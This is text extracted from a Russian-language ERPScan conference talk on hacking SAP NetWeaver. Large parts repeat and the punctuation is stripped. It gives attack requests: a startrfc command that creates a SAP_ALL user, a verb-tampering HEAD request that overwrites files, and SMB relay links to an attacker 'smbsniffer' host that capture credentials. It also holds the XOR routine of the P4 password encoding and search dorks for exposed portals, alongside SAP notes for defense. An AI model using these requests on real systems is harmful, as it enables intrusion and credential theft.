CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
